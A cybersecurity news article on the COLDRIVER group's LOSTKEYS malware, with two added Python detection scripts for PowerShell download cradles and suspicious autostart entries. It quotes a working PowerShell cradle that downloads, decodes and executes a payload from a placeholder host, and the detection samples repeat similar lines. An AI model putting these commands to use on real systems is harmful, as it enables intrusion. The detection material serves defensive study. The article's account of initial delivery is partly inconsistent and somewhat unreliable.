Russian COLDRIVER hacker group uses LOSTKEYS malware to steal sensitive data
The LOSTKEYS malware, developed by the Russian threat group COLDRIVER, spreads through phishing emails and carries out data-theft attacks against diplomatic institutions and critical infrastructure in Europe and North America. The malware exploits undisclosed vulnerabilities, runs silently in the background and evades detection. Its sophisticated techniques make it a significant advance in COLDRIVER's capabilities. 2025-05-08 04:54 Author: cybersecuritynews.com

Russian COLDRIVER Hackers Using LOSTKEYS Malware To Steal Sensitive Data

Cybersecurity researchers have uncovered a sophisticated malware campaign attributed to the Russian threat actor COLDRIVER, also known as Star Blizzard or Callisto.

The newly identified malware, dubbed LOSTKEYS, has been observed targeting diplomatic institutions, defense contractors, and critical infrastructure organizations across Europe and North America since early 2025.

Initial analysis indicates the malware is designed specifically for data exfiltration operations, with a focus on credentials, sensitive documents, and communications.


LOSTKEYS primarily propagates through spear-phishing emails containing malicious document attachments that exploit previously undisclosed vulnerabilities in popular office productivity software.

These emails are meticulously crafted to appear legitimate, often masquerading as correspondence from trusted partners or government agencies.

When the victim opens the attachment, a multi-stage infection process begins silently in the background, establishing persistence while evading detection by conventional security solutions.

Google Threat Intelligence researchers identified the campaign after observing unusual data transfer patterns from several high-profile organizations.

Their analysis revealed the malware’s sophisticated obfuscation techniques and command-and-control infrastructure, which leverages compromised legitimate websites as proxies to mask its true origin and complicate attribution efforts.

The impact of LOSTKEYS infections has been substantial, with affected organizations reporting significant intellectual property theft and unauthorized access to sensitive communications.

The malware’s stealthy nature means many victims remain unaware of its presence for extended periods, allowing the attackers to maintain persistent access and continuously harvest valuable data.

Security agencies across multiple countries have issued alerts warning potential targets about this evolving threat.

Execute the PowerShell via the ‘run’ prompt in Windows (Source – Google Cloud)

LOSTKEYS demonstrates COLDRIVER’s continued evolution in capabilities and tactics, representing a significant advancement over their previous tools.

The group’s targeting patterns align with Russian strategic intelligence priorities, further strengthening attribution confidence.

Infection Mechanism Analysis

The malware’s infection chain begins with a weaponized document containing obfuscated VBA macros.

When executed, these macros deploy a PowerShell downloader that retrieves the main LOSTKEYS payload:

$c = New-Object System.Net.WebClient;
$c.Headers.Add("User-Agent","Mozilla/5.0");
$d = $c.DownloadString("hxxps://compromised-site.com/images/update.txt");
$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($d));
Invoke-Expression $decoded

LOSTKEYS Payload Delivery (Source – Google Cloud)
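The downloader above is a textbook PowerShell download cradle: fetch text over HTTP, Base64-decode it, hand it to Invoke-Expression. Defenders who have PowerShell Script Block Logging (Event ID 4104) enabled can catch that chain even when the operator hides the tokens with backticks or string concatenation. The following is an added example written for this article, not code from Google or the original post; the log records are constructed, the hostnames and the example.invalid URL are placeholders, and the indicator set is an assumption a real deployment would tune.

```python
import re

# Constructed sample PowerShell ScriptBlockLogging (Event ID 4104) records for
# illustration; not real telemetry and not taken from the article.
SAMPLE_EVENTS = [
    # The same shape as the cradle shown in the article.
    {"host": "WS-01", "script": (
        "$c = New-Object System.Net.WebClient; "
        "$c.Headers.Add('User-Agent','Mozilla/5.0'); "
        "$d = $c.DownloadString('https://example.invalid/images/update.txt'); "
        "$decoded = [System.Text.Encoding]::UTF8.GetString("
        "[System.Convert]::FromBase64String($d)); "
        "Invoke-Expression $decoded")},
    # Backtick-obfuscated 'iex' alias and a shortened type name.
    {"host": "WS-02", "script": "I`EX (New-Object Net.WebClient).DownloadString('https://example.invalid/a.txt')"},
    # Benign admin activity: must not be flagged.
    {"host": "WS-03", "script": "Get-ChildItem C:\\Users | Where-Object { $_.Name -like 'a*' }"},
    # Method name split across a string concatenation.
    {"host": "WS-04", "script": "$m = 'FromBase64' + 'String'; [Convert]::$m('SGVsbG8=')"},
]

# Indicators are matched against the normalized (lower-cased, de-obfuscated) text.
INDICATORS = {
    "net_download": re.compile(
        r"\b(downloadstring|downloaddata|downloadfile|invoke-webrequest|iwr|invoke-restmethod|irm)\b"),
    "base64_decode": re.compile(r"frombase64string"),
    "dynamic_exec": re.compile(r"(invoke-expression|\biex\b)"),
    "webclient": re.compile(r"net\.webclient"),
}


def normalize(script: str) -> str:
    """Undo cheap obfuscation so the indicator regexes see plain tokens:
    case folding, backtick escapes inside identifiers, and literal string
    concatenation ('Foo' + 'Bar' -> 'FooBar')."""
    text = script.lower().replace("`", "")
    text = re.sub(r"(['\"])\s*\+\s*\1", "", text)
    return re.sub(r"\s+", " ", text).strip()


def classify(script: str):
    """Return (severity, matched_indicators); severity is None when nothing matched."""
    text = normalize(script)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    if not hits:
        return None, hits
    if "net_download" in hits and "dynamic_exec" in hits:
        severity = "high"     # fetch-and-execute: the full download-cradle chain
    elif "base64_decode" in hits and ("net_download" in hits or "dynamic_exec" in hits):
        severity = "medium"   # decode combined with fetch or exec, but not the full chain
    else:
        severity = "low"      # a single indicator; worth a look in context
    return severity, hits


def scan(events):
    """Run classify over {host, script} records and keep only the findings."""
    findings = []
    for ev in events:
        severity, hits = classify(ev["script"])
        if severity:
            findings.append({"host": ev["host"], "severity": severity, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['severity']:6} {', '.join(f['indicators'])}")
```

The normalization step is what makes the rule survive the two cheapest evasions (backticks and `'Foo' + 'Bar'` splitting); anything more elaborate, such as string reversal or `-EncodedCommand`, needs the decoded script block, which 4104 logging already gives you because PowerShell logs the code it actually compiles.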

This initial stage establishes persistence through a combination of registry modifications and scheduled task creation.
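Registry autostart entries and scheduled tasks are both well-logged: Sysmon Event 13 records Run-key value writes together with the writing process, and Security Event 4698 records scheduled task creation with the task's action. A small triage script can score those events by how much the registered command looks like a script-host launch. This is an added example written for this article, not Google's or the article's own code; the events are constructed, and the SID, paths and `BASE64PLACEHOLDER` encoded command are placeholders.

```python
import re

# Constructed Sysmon / Security-log style records for illustration (not real
# telemetry; SIDs, paths and the encoded command are placeholders).
SAMPLE_EVENTS = [
    # Sysmon Event 13: PowerShell writes a Run value that launches hidden, encoded PowerShell.
    {"host": "WS-01", "event_id": 13,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"HKU\S-1-5-21-EXAMPLE\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": "powershell.exe -w hidden -enc BASE64PLACEHOLDER"},
    # Sysmon Event 13: an installer registering a normal-looking autostart.
    {"host": "WS-02", "event_id": 13,
     "image": r"C:\Windows\System32\msiexec.exe",
     "target": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "details": r"C:\Program Files\Vendor\tray.exe"},
    # Security Event 4698: scheduled task whose action is a hidden PowerShell run.
    {"host": "WS-03", "event_id": 4698, "task_name": r"\Microsoft\Windows\Sync\Helper",
     "action": "powershell.exe -NoP -W Hidden -c \"& 'C:\\Users\\Public\\stage.ps1'\""},
    # Security Event 4698: plain vendor updater task.
    {"host": "WS-04", "event_id": 4698, "task_name": r"\Vendor\Update",
     "action": r"C:\Program Files\Vendor\update.exe /quiet"},
]

RUN_KEY = re.compile(r"\\currentversion\\run(once)?\\", re.I)
SCRIPT_HOST = re.compile(r"\b(powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32)(\.exe)?\b", re.I)
HIDDEN_FLAGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|-nop(rofile)?\b|-noni(nteractive)?\b)", re.I)


def score_event(ev):
    """Return (points, reasons) for one autostart-related event, or (0, [])
    when the event is not an autostart registration at all."""
    points, reasons = 0, []
    if ev["event_id"] == 13 and RUN_KEY.search(ev["target"]):
        points += 1
        reasons.append("run_key_write")
        command = ev["details"]
        if SCRIPT_HOST.search(ev["image"]):
            # The Run value was written by a script interpreter, not an installer.
            points += 1
            reasons.append("written_by_script_host")
    elif ev["event_id"] == 4698:
        points += 1
        reasons.append("scheduled_task_created")
        command = ev["action"]
    else:
        return 0, []
    if SCRIPT_HOST.search(command):
        points += 1
        reasons.append("command_is_script_host")
    if HIDDEN_FLAGS.search(command):
        points += 1
        reasons.append("hidden_or_encoded_flags")
    return points, reasons


def severity(points):
    return "high" if points >= 3 else "medium" if points == 2 else "low"


def hunt(events):
    """Score every event and return one finding per autostart registration."""
    findings = []
    for ev in events:
        points, reasons = score_event(ev)
        if points:
            findings.append({"host": ev["host"], "severity": severity(points), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['severity']:6} {', '.join(f['reasons'])}")
```

Every autostart registration produces a low finding, so the output doubles as an inventory; only the combination of a script host, hidden or encoded flags, and (for registry writes) a script-host writer pushes a record to high, which keeps vendor installers out of the queue.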

The malware then performs environment checks to identify security tools, executing evasive maneuvers when necessary.

LOSTKEYS communicates with its command servers using encrypted channels that mimic legitimate HTTPS traffic, making detection through network monitoring extremely challenging.

The malware’s modular architecture allows operators to deploy additional capabilities as needed, tailoring the attack to each specific target.



Source: https://cybersecuritynews.com/russian-coldriver-hackers-using-lostkeys-malware/